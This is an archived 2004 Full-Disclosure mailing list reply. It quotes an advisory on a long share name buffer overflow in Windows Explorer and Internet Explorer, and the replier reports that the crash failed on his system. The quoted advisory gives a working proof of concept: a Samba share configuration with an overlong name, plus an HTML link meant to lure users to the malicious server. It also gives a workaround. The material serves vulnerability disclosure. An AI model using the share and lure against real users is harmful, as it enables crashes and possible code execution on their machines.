[Full-Disclosure] Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

From: Daniel Regalado Arias (dan57170_at_yahoo.com)
Date: 04/26/04

  • Next message: Joshua J. Berry: "[Full-Disclosure] [ GLSA 200404-18 ] Multiple Vulnerabilities in ssmtp"
    To: Rodrigo Gutierrez <rodrigo@intellicomp.cl>, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com, submissions@packetstormsecurity.org, info@securiteam.com
    Date: Mon, 26 Apr 2004 15:55:55 -0500 (CDT)
    
    

    Well, i have tested it in W2k with sp3 and explorer
    didnt get crashed!!!!!!!

    Well, i cant get into the share because a message
    appears saying "share name not found"!!!!

    But, explorer is OK.

     --- Rodrigo Gutierrez <rodrigo@intellicomp.cl>
    escribió: > Sunday afternoon is a bit boring, and
    weather sucks
    > down here in Santiago,
    > Chile so here we go...
    > The vuln is attached in TXT format, I would be
    > gratefull if someone could
    > verify if it affects windows 2003 as well.
    >
    > Rodrigo.-
    > > Microsoft Explorer and Internet Explorer Long
    Share
    > Name Buffer Overflow.
    >
    >
    >
    > Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
    >
    > Affected: MS Internet Explorer, MS Explorer
    > (explorer.exe)
    > Windows XP(All), Windows 2000(All)
    >
    > Not Tested: Windows 2003, Windows me, Windows 98,
    > Windows 95
    >
    > Vendor Status: i notified the vendor in the
    > beginning of 2002, this
    > vulnerability was supposed to be
    > fixed in xp service
    > pack 1 according to the vendors
    > knowledge base article
    > 322857.
    >
    > Vendor url:
    >
    http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
    >
    >
    >
    > Background.
    >
    > MS Explorer (explorer.exe) and MS Internet
    > Explorer(IEXPLORE.EXE) are
    > core pieces of Microsoft Windows Operating Systems.
    >
    >
    >
    > Description
    >
    > Windows fails to handle long share names when
    > accessing a remote
    > file servers such as samba, allowing a malicious
    > server to crash the
    > clients explorer and eventually get to execute
    > arbitrary code in the
    > machine as the current user (usually with
    > Administrator rights in windows
    > machines).
    >
    >
    >
    > Analysis
    >
    > In order to exploit this, an attacker must be able
    > to get a user to connect
    > to a malicious server which contains a share name
    > equal or longer than 300
    > characters, windows wont allow you to create such a
    > share, but of course samba
    > includes the feature ;). After your samba box is
    > up and running create a
    > share in you smb.conf :
    >
    >
    >
    > #------------ CUT HERE -------------
    >
    >
    [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
    > comment = Area 51
    > path = /tmp/testfolder
    > public = yes
    > writable = yes
    > printable = no
    > browseable = yes
    > write list = @trymywingchung
    >
    > #------------ CUT HERE -------------
    >
    >
    > After your server is up, just get to your windows
    > test box and get to the
    > start menu > run > \\your.malicious.server.ip.,
    > plufff, explorer will crash
    > :).
    >
    > Social Engineering:
    >
    > <a href="\\my.malicious.server.ip">Enter My 0day
    > sploit archive</a>
    >
    >
    >
    > Workaround.
    >
    > From your network card settings disable the client
    > for Microsoft networks
    > until a real fix for this vulnerability is
    > available.
    >

    _________________________________________________________
    Do You Yahoo!?
    Información de Estados Unidos y América Latina, en Yahoo! Noticias.
    Visítanos en http://noticias.espanol.yahoo.com

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Joshua J. Berry: "[Full-Disclosure] [ GLSA 200404-18 ] Multiple Vulnerabilities in ssmtp"